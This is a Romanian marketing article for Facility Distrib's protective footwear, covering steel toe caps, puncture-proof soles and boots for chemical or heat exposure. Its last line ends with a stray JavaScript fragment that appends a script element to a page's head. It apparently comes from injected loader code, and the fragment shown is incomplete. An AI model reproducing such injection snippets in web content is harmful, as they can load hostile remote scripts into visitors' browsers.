incaltaminte de protectie

incaltaminte de protectie

Cunoasteti acea vorba de a calca pe picior pe cineva, nu? Ei bine, in anumite domenii de activitate industriala, riscul de a fi calcat pe picior este unul ce poate fi ignorat in comparatie cu ce riscuri exista. Daca a fi calcat pe picior de cineva mai corpolent este dureros, atunci imaginati-va cum ar fi sa va cada o caramida, sau un mocs (acel cleste foarte greu din otel). Ei bine, pentru ca oamenii ce activeaza in domenii ce prezinta acest gen de riscuri sa fie totusi cu picioarele nevatamate dupa o zi de lucru, Facility Distrib vine sa ofere incaltaminte de protectie dar si toate celalalte echipamente pentru protejarea diferitelor parti ale corpului, cum ar fi casti, manusi, ochelari, masti, precum si elemente de protectie pentru lucru la inaltime. Toate acestea pentru a oferi un mediu de lucru sigur, indiferent de natura riscului.

Forma de cupola si folosirea ei la incaltaminte de protectie

Ei bine, ce este diferit la o incaltaminte de protectie fata de o pereche de bocanci luata dintr-un magazin de articole de iarna, si mai ales, care este solutia pentru a proteja talpa purtatorului de accidentari cauzate de obiecte ascutite? Cand vine vorba despre protejarea degetelor de la picior, o pereche de incaltaminte de protectie se foloseste de o structura folosita foarte mult si in arhitectura dar si in domeniul echipamentelor de scufundare la adancime (submarine, roboti de adancime, etc) sau cel aviatic. Structura de dom a fost folosita pentru prima data in arhitectura pentru crearea boltelor. Domul sau semisfera este o forma tridimensionala ce permite suportarea unor forte puternice aplicate pe structura fara a provoca deteriorari ale structurii. Acest lucru se datoreaza faptului ca fortele de presiune sunt directionate spre partea inferioara. O structura similara cu domul este folosita si la o incaltaminte de protectie pentru a ocroti degetele picioarelor. De obicei acesta este construit dintr-o placa de otel sau aliaj cu grosimi diferite. In functie de model, o astfel de incaltaminte de protectie poate face fata unor forte foarte mari echivalente cu impacul unei sfere de 1Kg de la o inaltime de 10 metri.

Incaltaminte de protectie a talpii si speciale

Pentru ca nimeni nu-si doreste sa calce pe cuie sau pe obiecte teioase, majoritatea tipurilor de incaltaminte de protectie sunt echipate cu o lamela metalica (otel in general) sau din compozit. Aceasta protejeaza talpa purtatorului de orice risc de accidentare, fiind extrem de utili in ateliere de prelucrare a lemnului, precum si in constructii si nu numai.

Bineinteles, riscurile de accidentare nu se rezuma doar la lovituri si obiecte ascutite, in domenii ca cel chimic sau metalurgic sau alimentar, este necesara purtarea unei incaltaminte de protectie care sa protejeze piciorul de agenti corozivi sau de expunerea la temperaturi extreme. Toate acestea sunt necesare in domeniul industrial, iar persoanele care nu poarta astfel de protectii risca sa fie victimele unor accidente de munca serioase. Asadar, pentru toti cei care activeaza sau detin afaceri cu domenii de activitate industriala ce prezinta astfel de riscuri, Facility Distrib vine sa va ofere incaltaminte de protectie dar si toata gama de articole de protectie. Va asteptam pe siteul nostru, www.facilitydistrib.ro/echipamente-de-protectie pentru a afla mai multe.d.getElementsByTagName(‘head’)[0].appendChild(s);